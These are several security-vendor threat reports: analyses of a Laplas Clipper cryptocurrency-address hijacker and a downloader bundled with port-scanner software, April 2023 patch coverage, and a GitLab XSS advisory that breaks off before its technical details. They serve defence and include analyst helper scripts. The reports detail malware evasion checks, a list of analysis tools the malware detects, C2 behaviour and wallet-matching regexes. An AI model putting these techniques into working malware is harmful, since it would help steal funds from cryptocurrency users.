Laplas Clipper Strikes Again: With Anti Analysis Techniques

Recently, the SonicWall Capture Labs threat research team came across a new C++-based variant of Laplas Clipper that targets cryptocurrency users. Laplas Clipper variants written in .NET and Go have been observed in the past. This variant employs various anti-debug, anti-sandbox and anti-analysis techniques to evade detection.

The malware’s main purpose is to replace the victim’s cryptocurrency wallet address with a wallet address supplied by the threat actor, so that payments the user intends to make are diverted to the attacker.

Analysis: 

Before starting its main activity, the malware performs a series of anti-analysis checks to evade detection and stops executing if any condition is not satisfied.

Anti Sandbox():

  • Number of processors: the SYSTEM_INFO structure contains information about the current computer system, including the architecture, the processor type, the number of processors, the page size and other such details.

          The malware checks the NumberOfProcessors field, which must report more than 1 processor.

  • The GlobalMemoryStatusEx API retrieves information about the system’s current usage of both physical and virtual memory. The MEMORYSTATUSEX structure it fills contains the field ullTotalPhys, the total size of actual physical memory in bytes.

          The malware checks the ullTotalPhys field, which must be more than 2 GB.

  • DeviceIoControl sends a control code (in this case 0x70000, which corresponds to IOCTL_DISK_GET_DRIVE_GEOMETRY) directly to a specified device driver.

          The _DISK_GEOMETRY structure returned contains the media type, number of cylinders, tracks per cylinder, sectors per track and bytes per sector.

          The malware uses the _DISK_GEOMETRY fields to calculate the total size of the hard disk in bytes, which must be more than 80 GB for execution to continue; otherwise the malware exits.
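As an added example (not code from the SonicWall write-up or from the sample), the following Python reproduces the three environment gates so an analyst can check whether a sandbox VM's resources would let the sample run at all. It parses a DISK_GEOMETRY buffer as DeviceIoControl fills it and assumes the "GB" thresholds are binary gigabytes; the processor count, ullTotalPhys value and geometry buffers are constructed here, whereas on a Windows VM they would come from GetSystemInfo, GlobalMemoryStatusEx and DeviceIoControl.

```python
import struct

# DISK_GEOMETRY as filled in by IOCTL_DISK_GET_DRIVE_GEOMETRY (0x70000):
#   LARGE_INTEGER Cylinders; MEDIA_TYPE MediaType; DWORD TracksPerCylinder;
#   DWORD SectorsPerTrack; DWORD BytesPerSector;   -> 24 bytes, little-endian
DISK_GEOMETRY_FMT = "<qIIII"
DISK_GEOMETRY_SIZE = struct.calcsize(DISK_GEOMETRY_FMT)
FIXED_MEDIA = 12  # MEDIA_TYPE value FixedMedia

# Assumption: the report's "GB" thresholds are binary gigabytes. If the
# comparison in the binary turns out to use 10**9, change GIB here only.
GIB = 1024 ** 3


def disk_size_from_geometry(buf: bytes) -> int:
    """Total disk size in bytes from the geometry fields, as the clipper computes it."""
    if len(buf) < DISK_GEOMETRY_SIZE:
        raise ValueError("buffer shorter than DISK_GEOMETRY")
    cylinders, _media_type, tracks, sectors, bytes_per_sector = struct.unpack_from(
        DISK_GEOMETRY_FMT, buf
    )
    return cylinders * tracks * sectors * bytes_per_sector


def evaluate_gates(num_processors: int, total_phys_bytes: int, geometry: bytes) -> dict:
    """One entry per check described above; True means the sample would keep running."""
    return {
        "NumberOfProcessors > 1": num_processors > 1,
        "ullTotalPhys > 2 GB": total_phys_bytes > 2 * GIB,
        "disk size > 80 GB": disk_size_from_geometry(geometry) > 80 * GIB,
    }


def would_detonate(num_processors: int, total_phys_bytes: int, geometry: bytes) -> bool:
    """True only if every gate passes, i.e. the VM is provisioned generously enough."""
    return all(evaluate_gates(num_processors, total_phys_bytes, geometry).values())


# Constructed geometries: CHS 13054/255/63 with 512-byte sectors is roughly a
# 100 GiB disk; 5221 cylinders is roughly 40 GiB and would make the sample exit.
GEOMETRY_100G = struct.pack(DISK_GEOMETRY_FMT, 13054, FIXED_MEDIA, 255, 63, 512)
GEOMETRY_40G = struct.pack(DISK_GEOMETRY_FMT, 5221, FIXED_MEDIA, 255, 63, 512)

if __name__ == "__main__":
    # Constructed VM profile: 4 vCPUs, 8 GiB RAM, and each of the two disks.
    for label, geom in (("100G disk", GEOMETRY_100G), ("40G disk", GEOMETRY_40G)):
        print(label, evaluate_gates(4, 8 * GIB, geom))
```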

Anti Analysis():

  • IsDebuggerPresent(): Determines whether the current process is being debugged by a user-mode debugger such as OllyDbg or x64dbg. 
  • CreateToolhelp32Snapshot(): The malware enumerates the processes currently running on the system and compares each executable name against the following list of common analysis tools:

ida.exe, x32dbg.exe, x64dbg.exe, ida64.exe, wireshark.exe, netstat.exe, netmon.exe, tcpview.exe, filemon.exe, regmon.exe  

 

  • IsNonWritableinCurrentImage(): If a process is running under a debugger and an invalid handle is passed to ntdll!NtClose or kernel32!CloseHandle, an EXCEPTION_INVALID_HANDLE (0xC0000008) exception is raised. The exception can be caught by an exception handler; if control reaches the handler, a debugger is present.
  • NtDelayExecution(): Suspends execution for a specified number of nanoseconds.
  • GetTickCount64(): Measures the elapsed time between function calls; if the difference is less than a specified value, the malware concludes it is executing in a controlled environment and stops executing.

After performing all the checks above, the malware checks whether it is running from the %Appdata% folder. If not, it copies a bloated copy of itself (701 MB) into %Appdata%, padding the file by appending random bytes as an overlay. The malware does this to evade scanning by various security products, a technique recently seen in the Emotet malware family.

The malware adds an autorun entry for itself for persistence:

The malware then launches its copy from %Appdata% through the command line using the ShellExecuteA API:

Wallet Address Exchange:

The malware starts by decrypting all of its encrypted strings, the regular expressions (regex) for cryptocurrency wallet addresses and the C2 URL.

The malware sends a GET request to download the regex from the C2 server:

The regex (the rows below are alternatives of one combined expression, opened by ^(?: on the first row and closed by )$ on the last) covers the following cryptocurrency wallet address formats:

Cryptocurrency        Regular expression
Bitcoin (BTC)         ^(?:(1[1-9A-HJ-NP-Za-km-z]{32,33})
Bitcoin (BTC)         (3[1-9A-HJ-NP-Za-km-z]{32,33})
Bitcoin (BTC)         (bc1q[023456789acdefghjklmnpqrstuvwxyz]{38,58})
Bitcoin Cash (BCH)    (q[a-z0-9]{41})
Bitcoin Cash (BCH)    (p[a-z0-9]{41})
Litecoin (LTC)        (L[a-km-zA-HJ-NP-Z0-9]{33})
Litecoin (LTC)        (M[a-km-zA-HJ-NP-Z0-9]{33})
Litecoin (LTC)        (ltc1q[a-zA-Z0-9]{38})
Ethereum (ETH)        (0x[a-fA-F0-9]{40})
Binance Coin (BNB)    (bnb1[0-9a-z]{38})
Dogecoin (DOGE)       (D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})
Monero (XMR)          (4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})
Monero (XMR)          (8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})
Ripple (XRP)          (r[0-9a-zA-Z]{33})
Tezos                 (t1[a-km-zA-HJ-NP-Z1-9]{33})
Dash (DASH)           (X[1-9A-HJ-NP-Za-km-z]{33})
Ronin (RON)           (ronin:[a-fA-F0-9]{40})
Tron (TRX)            (T[A-Za-z1-9]{33})
Tezos (XTZ)           (tz[1-3][1-9A-HJ-NP-Za-km-z]{33})
Cardano (ADA)         (addr1[a-z0-9]+)
Cosmos (ATOM)         (cosmos1[a-z0-9]{38})
Ripple (XRP)          (R[a-zA-Z0-9]{33})
UNKNOWN               ([A-Z2-7]{58})
UNKNOWN               ([1-9A-HJ-NP-Za-km-z]{44}))$
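Reassembling the table into the clipper's single anchored expression makes its matching behaviour testable. The Python below is an added example, not code from the write-up: the addresses it checks are constructed strings of the right shape (not real wallets), and swap_would_trigger is an assumed heuristic for a clipboard monitor that flags one recognised address being replaced by another of the same currency, which is the clipper's end result.

```python
import re

# The rows of the table above, in order. The clipper's full expression is
# ^(?:(row1)|(row2)|...)$, so the entire clipboard content must be one address.
WALLET_PATTERNS = [
    ("Bitcoin (BTC)", r"1[1-9A-HJ-NP-Za-km-z]{32,33}"),
    ("Bitcoin (BTC)", r"3[1-9A-HJ-NP-Za-km-z]{32,33}"),
    ("Bitcoin (BTC)", r"bc1q[023456789acdefghjklmnpqrstuvwxyz]{38,58}"),
    ("Bitcoin Cash (BCH)", r"q[a-z0-9]{41}"),
    ("Bitcoin Cash (BCH)", r"p[a-z0-9]{41}"),
    ("Litecoin (LTC)", r"L[a-km-zA-HJ-NP-Z0-9]{33}"),
    ("Litecoin (LTC)", r"M[a-km-zA-HJ-NP-Z0-9]{33}"),
    ("Litecoin (LTC)", r"ltc1q[a-zA-Z0-9]{38}"),
    ("Ethereum (ETH)", r"0x[a-fA-F0-9]{40}"),
    ("Binance Coin (BNB)", r"bnb1[0-9a-z]{38}"),
    ("Dogecoin (DOGE)", r"D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}"),
    ("Monero (XMR)", r"4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}"),
    ("Monero (XMR)", r"8[0-9AB][1-9A-HJ-NP-Za-km-z]{93}"),
    ("Ripple (XRP)", r"r[0-9a-zA-Z]{33}"),
    ("Tezos", r"t1[a-km-zA-HJ-NP-Z1-9]{33}"),
    ("Dash (DASH)", r"X[1-9A-HJ-NP-Za-km-z]{33}"),
    ("Ronin (RON)", r"ronin:[a-fA-F0-9]{40}"),
    ("Tron (TRX)", r"T[A-Za-z1-9]{33}"),
    ("Tezos (XTZ)", r"tz[1-3][1-9A-HJ-NP-Za-km-z]{33}"),
    ("Cardano (ADA)", r"addr1[a-z0-9]+"),
    ("Cosmos (ATOM)", r"cosmos1[a-z0-9]{38}"),
    ("Ripple (XRP)", r"R[a-zA-Z0-9]{33}"),
    ("UNKNOWN", r"[A-Z2-7]{58}"),
    ("UNKNOWN", r"[1-9A-HJ-NP-Za-km-z]{44}"),
]

# Each alternative is its own capturing group, numbered 1..N in table order.
WALLET_REGEX = re.compile(
    "^(?:" + "|".join("(%s)" % pattern for _, pattern in WALLET_PATTERNS) + ")$"
)


def classify_clipboard_text(text: str):
    """Return the currency label of the alternative that matched, or None."""
    match = WALLET_REGEX.match(text)
    if match is None:
        return None
    # Exactly one alternative can match, so lastindex is its group number.
    return WALLET_PATTERNS[match.lastindex - 1][0]


def swap_would_trigger(before: str, after: str) -> bool:
    """Clipboard-monitor heuristic: contents changed from one recognised address
    to a different address of the same currency, which is what a clipper leaves behind."""
    kind_before = classify_clipboard_text(before)
    kind_after = classify_clipboard_text(after)
    return kind_before is not None and kind_before == kind_after and before != after


# Constructed clipboard contents of the right shape; none is a real wallet.
SAMPLE_CLIPBOARD = [
    "0x" + "ab12" * 10,          # Ethereum-style: 0x plus 40 hex characters
    "1" + "2" * 33,              # Bitcoin legacy-style: 1 plus 33 base58 characters
    "4A" + "B" * 93,             # Monero-style: 4, one of [0-9AB], 93 base58 characters
    "meeting notes for Monday",  # ordinary text the clipper ignores
]

if __name__ == "__main__":
    for item in SAMPLE_CLIPBOARD:
        print(repr(item[:24]), "->", classify_clipboard_text(item))
```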

After receiving the regex list, the malware registers itself with the C2 server by sending a GET request containing a GUID (computer name\\username) and a key, which the malware encrypts with a simple XOR.

The malware then runs in an infinite loop, searching the clipboard buffer for cryptocurrency wallet addresses using the regular expressions. It uses the GetClipboardData and SetClipboardData APIs to fetch and replace clipboard data respectively.

If the malware finds a valid wallet address in the clipboard, it sends a GET request to obtain a similar-looking threat actor’s wallet address, so that it can replace the victim’s original address with it and receive the payment sent by the victim.

After receiving the similar wallet address from the C2 server, the malware replaces the victim’s wallet address with it:

Although the malware’s functionality is small, it can cause huge financial losses to victims.

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

IOC: 

634129f11f0b78602fe43104fa0b8b987bfbecb0670d078db870e7acceed8831 

Unveiling the Hidden Threat: Malware Disguised as Trusted Downloads

The SonicWall Capture Labs threat research team has observed and analyzed new malware that is distributed alongside legitimate software such as Advanced Port Scanner. The malware can download and execute an additional malware payload, as well as receive and execute commands from a remote command and control server.

The malware comes bundled with legitimate software such as Advanced Port Scanner. One of the bundled components is a malicious DLL named ssleay32.dll, a file name shared with a library commonly used by open-source projects such as OpenSSL and Qt.

Analysis: 

When the main Setup.exe runs, it loads the malicious packed DLL (ssleay32.dll) into memory.

Stage 1: 

The DLL code is obfuscated with fake API calls:

Once the DLL is loaded into memory, it decodes Base64-encoded shellcode onto the heap and starts executing from there. The shellcode contains the encrypted downloader module, which is later decrypted using the Tiny Encryption Algorithm (TEA).

The malware uses API hashing to resolve API addresses: library names and API names are stored as CRC32 hashes and resolved at runtime:

After decrypting the downloader module, the malware injects it into a newly created, suspended “explorer.exe” process using the process hollowing technique:
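An added Python example, not code from the report or the sample: building a CRC32 lookup table of export names so that hashes carved from the shellcode can be resolved back to library and API names. It assumes the standard zlib CRC32 with no custom seed (the report only says CRC32) and uses a constructed export list where an analyst would dump the real DLL export tables.

```python
import zlib


def api_hash(name: str) -> int:
    """CRC32 of the ASCII name. Assumption: the standard IEEE/zlib CRC32 with no
    custom seed or post-processing; if the sample differs, change only this function."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


# Constructed stand-in for export names; in practice, read the export tables
# of the system DLLs the shellcode is expected to use.
SAMPLE_EXPORTS = {
    "kernel32.dll": [
        "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CreateProcessW",
        "WriteProcessMemory", "ResumeThread",
    ],
    "ntdll.dll": ["NtUnmapViewOfSection", "NtCreateSection", "NtMapViewOfSection"],
    "wininet.dll": ["InternetOpenA", "InternetOpenUrlA", "InternetReadFile"],
}


def build_hash_table(exports: dict) -> dict:
    """Map hash -> (library, symbol). Library names are hashed both as written and
    lowercased because samples differ in how they normalise the name before hashing."""
    table = {}
    for library, names in exports.items():
        for variant in {library, library.lower()}:
            table[api_hash(variant)] = (variant, None)
        for name in names:
            table[api_hash(name)] = (library, name)
    return table


def resolve_hashes(hashes, table: dict) -> dict:
    """Resolve 32-bit hashes carved from the sample; unknown values map to None."""
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    # Constructed "carved" values: two we can resolve and one we cannot.
    carved = [api_hash("kernel32.dll"), api_hash("VirtualAlloc"), 0x12345678]
    for value, hit in resolve_hashes(carved, table).items():
        print(f"0x{value:08x} -> {hit}")
```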

Stage 2:

Command and Control (C2) Server communication:  

At this point, the downloader starts executing by sending a GET request to the C2 server:

The downloader builds the GET request for the domain “chap-domain[.]com”, which is hardcoded in the binary. The malware configuration is encrypted with the RC4 algorithm and decrypted at runtime; the malware uses three different RC4 keys, one per operation, stored in the .data section of the binary. It uses an implementation of the Mersenne Twister random number generator (MTRNG) to generate the random values for the query string “%s?a=%s&id=%s”.

A CyberChef snapshot showing the decryption of the malware configuration with the RC4 algorithm:

GET request sent to the C2:

Decrypted C2 response:

The downloader uses the open-source RapidJSON C++ library to parse the C2 response.

The C2 response contains various commands and options that direct further execution:
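The CyberChef step reproduced in code, as an added example rather than anything from the report: an RC4 routine checked against a published test vector and applied to a constructed config blob. The keys, the NUL-separated blob layout and the try_all_keys helper are assumptions; only the domain and the query-string format come from the analysis above.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream generation; encrypt and decrypt are identical."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Constructed stand-ins: the report says three keys live in .data, one per
# operation, but neither the keys nor the exact blob layout are published.
SAMPLE_KEYS = {
    "config": b"constructed-config-key",
    "request": b"constructed-request-key",
    "response": b"constructed-response-key",
}
# Constructed config layout: NUL-separated strings (values taken from the report).
SAMPLE_CONFIG_PLAINTEXT = b"chap-domain[.]com\x00%s?a=%s&id=%s\x00"
SAMPLE_CONFIG_BLOB = rc4(SAMPLE_KEYS["config"], SAMPLE_CONFIG_PLAINTEXT)


def decrypt_config(blob: bytes, key: bytes) -> list:
    """Decrypt and split a NUL-separated config blob into its strings."""
    plain = rc4(key, blob)
    return [part.decode("ascii", "replace") for part in plain.split(b"\x00") if part]


def try_all_keys(blob: bytes, keys: dict) -> dict:
    """When it is unclear which carved key belongs to the config, try each one and
    keep only outputs that decode to printable ASCII (plus NUL separators)."""
    hits = {}
    for name, key in keys.items():
        plain = rc4(key, blob)
        if all(b == 0 or 0x20 <= b < 0x7F for b in plain):
            hits[name] = plain
    return hits


if __name__ == "__main__":
    print("blob:", SAMPLE_CONFIG_BLOB.hex())
    print("decrypted:", decrypt_config(SAMPLE_CONFIG_BLOB, SAMPLE_KEYS["config"]))
    print("keys that yield printable output:", list(try_all_keys(SAMPLE_CONFIG_BLOB, SAMPLE_KEYS)))
```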

{
    "postback": "true",                      <-- response back is true
    "geo": "IN",                             <-- geo location
    "crypto_domain": "false",
    "powershell": "false",                   <-- PowerShell commands to execute
    "moderation": "false",
    "postback_id": "false",
    "postback_url": "post-make.com",         <-- domain to send another GET request to
    "postback_path": "c4fel7k.php?cnv_id="   <-- URL path
}

At the time of analysis, the C2 server did not respond with any of the other available commands.

The malware can download a file from a URL sent by the C2 server and execute it.

The following code snippet shows the ability to download a file from a URL and save it to a temporary path:

The following code snippet shows the execution of the downloaded file as a new process:

The following code snippet shows the execution of PowerShell commands received from the C2:


SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):

DLL files

Microsoft Security Bulletin Coverage for April 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-21554 Microsoft Message Queuing Remote Code Execution Vulnerability
IPS 3699: Microsoft Message Queuing RCE (CVE-2023-21554)

CVE-2023-24912 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 436: Exploit-exe exe.MP_315

CVE-2023-28218 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
ASPY 437: Exploit-exe exe.MP_316

CVE-2023-28219 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability
IPS 3701: Windows L2TP Handling RCE (CVE-2023-28219)

CVE-2023-28220 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability
IPS 18418: Windows L2TP Handling RCE (CVE-2023-28220)

CVE-2023-28266 Windows Common Log File System Driver Information Disclosure Vulnerability
ASPY 433: Exploit-exe exe.MP_313

CVE-2023-28274 Windows Win32k Elevation of Privilege Vulnerability
ASPY 434: Exploit-exe exe.MP_314

CVE-2023-28252 Windows Common Log File System Driver Elevation of Privilege Vulnerability
This CVE is exploited in ransomware attacks, which are covered by GAV:Nokoyawa.RSM.

Adobe Coverage:
CVE-2023-26417 Acrobat Reader arbitrary code execution
ASPY 438: Malformed-pdf pdf.MP_509

CVE-2023-26406 Acrobat Reader security feature bypass
ASPY 435: Malicious-js js.MP_28

The following vulnerabilities do not have exploits in the wild:
CVE-2023-21727 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21729 Remote Procedure Call Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21769 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-23375 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23384 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24860 Microsoft Defender Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-24883 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-24884 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24885 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24886 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24887 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24893 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24914 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-24924 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24925 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24926 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24927 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24928 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24929 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24931 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28216 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28217 Windows Network Address Translation (NAT) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28221 Windows Error Reporting Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28222 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28223 Windows Domain Name Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28224 Windows Point-to-Point Protocol over Ethernet (PPPoE) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28225 Windows NTLM Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28226 Windows Enroll Engine Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28227 Windows Bluetooth Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28228 Windows Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-28229 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28232 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28233 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28234 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28235 Windows Lock Screen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28236 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28237 Windows Kernel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28238 Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28240 Windows Network Load Balancing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28241 Windows Secure Socket Tunneling Protocol (SSTP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28243 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28244 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28246 Windows Registry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28247 Windows Network File System Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28248 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28249 Windows Boot Manager Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28250 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28251 Windows Driver Revocation List Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28253 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28254 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28255 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28256 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28260 .NET DLL Hijacking Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28262 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28263 Visual Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28267 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28268 Netlogon RPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28269 Windows Boot Manager Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28270 Windows Lock Screen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28271 Windows Kernel Memory Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28272 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28273 Windows Clip Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28275 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28276 Windows Group Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28277 Windows DNS Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28278 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28285 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28287 Microsoft Publisher Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28288 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-28291 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28292 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28293 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28295 Microsoft Publisher Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28296 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28297 Windows Remote Procedure Call Service (RPCSS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28298 Windows Kernel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28299 Visual Studio Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-28300 Azure Service Connector Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28302 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28304 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28305 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28306 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28307 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28308 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28309 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-28311 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28312 Azure Machine Learning Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28313 Microsoft Dynamics 365 Customer Voice Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-28314 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.

GitLab CE and EE Kroki Diagram Stored XSS Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  GitLab is a web-based platform for software development and collaboration, offering a comprehensive suite of tools for version control, continuous integration, and continuous deployment. It comes in two editions: Community Edition (CE) and Enterprise Edition (EE).

  The Community Edition is an open-source, self-hosted solution that provides core features for project management, code repositories, and collaborative development. It’s suitable for smaller teams, individual developers, and organizations that require basic functionality. The Enterprise Edition, on the other hand, is a commercial offering that includes all the features of the Community Edition, along with advanced features tailored to the needs of larger organizations and enterprises. EE offers enhanced security, compliance, and performance, as well as premium support options. This edition is available in different tiers, such as Premium and Ultimate, to cater to varying business requirements and budgets.

  A cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper validation of user input in Kroki diagrams.

  A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution in the security context of the target user’s browser.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0050.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:U/RL:O/RC:C).

  Base score is 7.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is low.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 6.4 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

